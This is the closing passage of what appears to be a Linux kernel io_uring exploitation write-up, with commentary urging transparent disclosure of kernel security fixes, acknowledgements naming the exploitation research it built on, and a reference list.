Another thing that I noticed is the general culture around security fixes in the Linux kernel. [While this is nothing new](https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/), I was surprised to see how it permeates to a microscopic level [ [30]](https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/). Small things such as modifying “Reported by” tags because the email has “security” in the domain name, or [removing a CVE identifier from a commit message](https://twitter.com/grsecurity/status/1486795432202276864) seem to be a common occurrence [ [31]](https://twitter.com/grsecurity/status/1486795432202276864). What is the benefit gained by obfuscating a security issue, in particular, one that already has an assigned CVE?
Exploitable vulnerabilities are patched in the upstream kernel, without a CVE, or even an honest commit message identifying them as security bugs, all the time. The consequences of this are undeniable; it has prevented patches for exploitable vulnerabilities from being backported, and these vulnerabilities are later exploited [in the wild](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html) [ [28]](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html). Attackers are capable of looking through commits to find these hidden vulnerabilities, and they’re incentivized to do so. Defenders shouldn’t be burdened with this as well.
I believe that for Linux kernel security to improve, an updated, straightforward guide on the appropriate way to disclose a vulnerability should be agreed upon and released. Additionally, transparency on what patches address security issues will help prevent downstream consumers from shipping vulnerable software.
## Acknowledgements
[Vitaly Nikolenko](https://twitter.com/vnik5287), for outstanding Linux kernel exploitation research. I used his universal heap spray technique in my exploit and as a basis for my universal heap leak technique.
[Jann Horn](https://twitter.com/tehjh), for outstanding Linux kernel exploitation research. I used his research on schedulers as well as FUSE blocking in my exploit.
[Alexander Popov](https://twitter.com/a13xp0p0v), for outstanding Linux kernel exploitation research. I used his research as a guide on how to construct this exploit.
[Andréa](https://twitter.com/and_zza), for her incredible work creating the diagrams in this post.
[Ryota Shiga](https://twitter.com/Ga_ryo_), for his excellent post on [exploiting io_uring](https://flattsecurity.medium.com/cve-2021-20226-a-reference-counting-bug-which-leads-to-local-privilege-escalation-in-io-uring-e946bd69177a). This post helped me understand `io_uring` internals when getting started.
[netspooky](https://twitter.com/netspooky), for the blog post title, edits, and general moral support.
## References
1. https://blogs.oracle.com/linux/post/an-introduction-to-the-io-uring-asynchronous-io-framework
2. https://twitter.com/axboe/status/1483790445532512260
3. https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html
4. https://unixism.net/loti/what_is_io_uring.html
5. https://lwn.net/Articles/810414/
6. https://kernel.dk/io_uring.pdf
7. https://unixism.net/loti/tutorial/sq_poll.html
8. https://unixism.net/loti/async_intro.html
9. https://www.theregister.com/2021/06/22/spectre_linux_performance_test_analysis/
10. https://github.com/axboe/liburing
11. https://windows-internals.com/ioring-vs-io_uring-a-comparison-of-windows-and-linux-implementations/
12. https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html
13. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41073
14. https://lwn.net/Articles/813311/
15. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3491
16. https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/
17. https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html
18. https://www.spinics.net/lists/io-uring/msg09009.html
19. https://duasynt.com/blog/linux-kernel-heap-spray
20. https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/
21. https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
22. https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf
23. https://hammertux.github.io/slab-allocator
24. https://twitter.com/tehjh/status/1438330352075001856
25. https://ruia-ruia.github.io/NFC-UAF/
26. https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
27. https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html
28. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html
29. https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch
30. https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/
31. https://twitter.com/grsecurity/status/1486795432202276864
32. https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44